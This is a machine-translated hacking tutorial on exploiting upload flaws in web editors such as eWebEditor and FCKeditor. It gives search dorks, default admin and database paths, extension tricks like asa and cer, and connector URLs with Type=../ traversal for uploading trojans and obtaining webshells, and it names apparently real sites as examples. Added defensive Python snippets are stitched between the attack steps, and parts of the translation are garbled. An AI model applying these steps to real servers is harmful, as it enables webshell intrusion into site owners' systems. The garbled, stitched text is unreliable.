Several search editor Vulnerabilities

Source: Internet
Author: User

Site: editor inurl: asp? Id inurl: ewebeditornet

For example, common editor vulnerabilities include:

Ewebeditor
Ewebeditornet
Fckeditor
Editor
Southidceditor
SouthidcEditor
Bigaccessories ditor


I. ewebeditor


1: The default admin backend:

http://www.test.com/ewebeditor/admin_login.asp

If you can log in to the backend:

Click style management.

Make a copy of the standard style (the standard style cannot be modified directly).

Add the image type (asa, aaspsp) to the copy and click Preview.

Click design in the editor and then upload the asa Trojan directly.

After uploading, you can see the location of the Trojan in the code.

(Principle: the IIS website properties map the asa extension to asp.dll for parsing, and cer and cdx are handled the same way as asp.)

If the cer cdx asa is deleted, the ing cannot be found.

After copying the style, you can add aaspsp to its image types and then upload asp files directly.
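An entry such as aaspsp only helps against a filter that deletes forbidden strings once and keeps whatever is left. The following is an added example, not eWebEditor's code and not part of the original article: it contrasts such a filter with an allowlist check. The single-pass behaviour, the "|" separator and the image allowlist are assumptions made for the illustration.

```python
# Added example. Extension names come from the article; the filter behaviour,
# the "|" separator and the allowlist are assumptions for illustration.
SCRIPT_MAPPED = {"asp", "asa", "cer", "cdx"}   # parsed by asp.dll per the article
IMAGE_ALLOWLIST = {"gif", "jpg", "jpeg", "png", "bmp"}


def single_pass_strip(ext_config):
    """Weak filter (assumed): delete each forbidden string once, keep the rest."""
    for bad in sorted(SCRIPT_MAPPED):
        ext_config = ext_config.replace(bad, "")
    return ext_config


def validate_style_extensions(ext_config):
    """Hardened: never rewrite the input; reject the setting on any unknown entry."""
    entries = [e.strip().lower() for e in ext_config.split("|") if e.strip()]
    unknown = [e for e in entries if e not in IMAGE_ALLOWLIST]
    if unknown:
        raise ValueError("extension(s) not on the allowlist: %s" % unknown)
    return entries


def upload_allowed(filename):
    """Accept a file only if its last extension is allowlisted and no
    dot-separated part of the name is a script-mapped extension."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False
    if any(p in SCRIPT_MAPPED for p in parts[1:]):
        return False
    return parts[-1] in IMAGE_ALLOWLIST


if __name__ == "__main__":
    # The single-pass filter leaves a script extension in the style setting.
    print(single_pass_strip("gif|jpg|aaspsp"))
    for name in ("photo.JPG", "x.asa", "x.asp.jpg"):
        print(name, upload_allowed(name))
```

The check belongs on the server at both points: when a style's extension list is saved and again when each file is received.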


2: Download the default database

www.test.com/ewebeditor/db/ewebeditor.mdb

Then analyze the database:

webeditor_system (1): you can see the user name and password, which cannot be cracked.

webeditor_style (14) is the style table; it holds the extensions of the files that can be uploaded (s-fileext s_ingeext).

I have seen that some small-time hacker had already added asa aaspsp there.

You can use it! (This method also works if the backend cannot be found.)

URLs that can be constructed:

For example, ID = 46, s-name = standard1

Constructed URL: ewebeditor.asp?id=content&style=standard

After the ID and style name are changed:

ewebeditor.asp?id=46&style=standard1


Then, go to the editor and upload the asa or asp file to get the webshell.

II. Exploitation of ewebeditornet vulnerabilities

Default upload address:

www.test.com/ewebeditornet/upload.aspx


You can directly upload a cer Trojan.

If the upload fails, you can construct the following code in the address bar: javascript:lbtnUpload.click();

Then view the source code:

Search for uploadsave to find the address.

Files are uploaded to the previusfile folder by default.

(Vulnerability repair: in IIS, set the execute permissions of the upload folder to None.)

III. fckeditor vulnerability exploitation

http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/
Change the file field name to NEWfile and choose the file name you want to define.
After the upload, find the file in /userfiles/image/.


IV. southidceditor

http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

http://www.xhkjit.com/admin/southidceditor/popup.asp

http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp
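The default paths listed in the sections above are easy to match in web server logs. The following is an added example, not part of the original article: it classifies request lines and flags served .mdb files, editor admin login pages, connector requests whose Type is not a standard resource type, and requests for asa, cer or cdx files. The log layout and the sample lines are constructed for the illustration.

```python
import posixpath
from urllib.parse import parse_qs

# Assumed field order for the constructed sample below (W3C-style, space separated).
FIELDS = ("date", "time", "method", "stem", "query", "ip", "status")
STANDARD_TYPES = {"file", "image", "flash", "media"}
SCRIPT_EXTS = {".asa", ".cer", ".cdx"}
ADMIN_PAGES = ("/ewebeditor/admin_login.asp", "/southidceditor/admin/admin_login.asp")
CONNECTOR = "/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp"

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = f"""\
2024-05-01 09:00:01 GET /ewebeditor/db/ewebeditor.mdb - 203.0.113.7 200
2024-05-01 09:00:05 GET /ewebeditor/admin_login.asp - 203.0.113.7 200
2024-05-01 09:01:10 POST {CONNECTOR} Command=FileUpload&Type=all&CurrentFolder=/ 203.0.113.7 200
2024-05-01 09:01:30 GET /UserFiles/all/1.asa - 203.0.113.7 200
2024-05-01 09:02:00 POST {CONNECTOR} Command=FileUpload&Type=Image&CurrentFolder=/ 198.51.100.20 200
2024-05-01 09:02:05 GET /UserFiles/Image/logo.png - 198.51.100.20 200
"""


def classify(line):
    """Return the list of findings for one log line (empty if nothing matches)."""
    rec = dict(zip(FIELDS, line.split()))
    stem = rec["stem"].lower()
    ext = posixpath.splitext(stem)[1]
    query = "" if rec["query"] == "-" else rec["query"]
    params = {k.lower(): v for k, v in parse_qs(query).items()}
    findings = []
    if ext == ".mdb" and rec["status"] == "200":
        findings.append("database file served")
    if stem.endswith(ADMIN_PAGES):
        findings.append("editor admin login requested")
    if stem.endswith(("/connector.asp", "/browser.html")):
        for value in params.get("type", []):
            if value.lower() not in STANDARD_TYPES:
                findings.append("non-standard Type=" + value)
    if ext in SCRIPT_EXTS:
        findings.append("script-mapped extension requested")
    return findings


def scan(log_text):
    """Return (client ip, uri stem, findings) for every line with a finding."""
    hits = []
    for line in log_text.splitlines():
        if line.strip() and not line.startswith("#"):
            found = classify(line)
            if found:
                hits.append((line.split()[5], line.split()[3], found))
    return hits
```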


V. bigaccessories ditor

This one is not covered on this page.

Similar principles!

The defense method is very simple,


FCKeditor upload vulnerability:

http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

Open this address to upload files of any type. The uploaded Trojan ends up at:
http://www.xxx.com/UserFiles/all/1.asa
The variable "Type=all" is defined by yourself. The directory "all" is created here, and the new directory does not have any restrictions on the file format to be uploaded.

For example, input:
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp

The uploaded file is then under http://www.xxx.com/UserFiles/monyer/.

And if you enter: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
you can upload the script to the root directory of the website; the uploaded file is under the root directory of the website.
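The behaviour described above comes from the connector trusting the caller-supplied Type value. The following is an added example, not FCKeditor's code and not part of the original article: it shows the server-side check that closes it, with Type restricted to a fixed set and the resolved folder required to stay inside that type's directory. The function and exception names are hypothetical, and the /UserFiles root is taken from the URLs above.

```python
import posixpath

USERFILES_ROOT = "/UserFiles"                          # upload root seen in the article's URLs
RESOURCE_TYPES = {"File", "Image", "Flash", "Media"}   # fixed set, never caller-defined


class RejectedRequest(ValueError):
    """Raised when Type or CurrentFolder fails validation (hypothetical name)."""


def resolve_upload_dir(type_param, current_folder="/"):
    """Map Type and CurrentFolder to a directory, or raise RejectedRequest."""
    # 1. Type must be one of the known resource types; no directory is created
    #    for arbitrary values such as "all", "monyer" or "../".
    if type_param not in RESOURCE_TYPES:
        raise RejectedRequest("unknown resource type: %r" % type_param)
    type_root = posixpath.join(USERFILES_ROOT, type_param)

    # 2. Normalise the folder and require the result to stay under type_root.
    folder = current_folder.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(type_root, folder))
    if candidate != type_root and not candidate.startswith(type_root + "/"):
        raise RejectedRequest("folder escapes %s: %r" % (type_root, current_folder))
    return candidate


def check(type_param, current_folder="/"):
    """Return the resolved directory, or a 'rejected: ...' string."""
    try:
        return resolve_upload_dir(type_param, current_folder)
    except RejectedRequest as exc:
        return "rejected: %s" % exc


if __name__ == "__main__":
    for t, f in (("Image", "/"), ("all", "/"), ("monyer", "/"),
                 ("../", "/"), ("Image", "/../../")):
        print(t, f, "->", check(t, f))
```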

http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?ForumID=46&threadID=457&messageID=532&ListType=FromForum&FromCurrentPage=1&time=1219282232781
